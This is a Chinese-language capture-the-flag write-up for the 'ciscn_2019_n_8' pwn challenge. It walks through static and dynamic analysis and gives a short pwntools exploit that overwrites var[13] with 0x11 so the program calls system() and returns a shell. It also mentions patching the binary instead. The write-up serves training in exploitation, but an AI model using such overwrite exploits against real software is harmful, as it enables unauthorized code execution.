一、查看属性
首先还是必要的查看属性环节:
可以知道该文件是一个x86架构下的32位小段ELF程序,这个程序开启了全部保护模式
我们执行看看:
二、静态分析
这里大致意思是读入数据,然后4字节,也就是双字,也就是4字节放入一个var[n]单元中,当var[13]为一个数时直接调用system函数
三、动态调试
我们直接来动态找一下这个固定值是谁
当我们输入14个‘aaaa’后单步走到下图位置:
可以看到此时我们输入到var[13]中的aaaa在eax中,之后和0x11异或,异或就相当于若两边数值一样则结果为0,最后的test和jne也基本证明这个常数就是0x11,也就是17
exp
写exp如下:
from pwn import *
io = process('./ciscn_2019_n_8')
payload = 'a'* 13 * 4 + p32(0x11) + p32(0x0)
print(payload)
io.sendline(payload)
io.interactive()
成功 !!
换个思路
它是两次比较最后到system函数,我们直接改程序,修改方法在https://blog.csdn.net/weixin_54452942/article/details/137048075?spm=1001.2014.3001.5501
中有详细介绍
修改如下
成功!!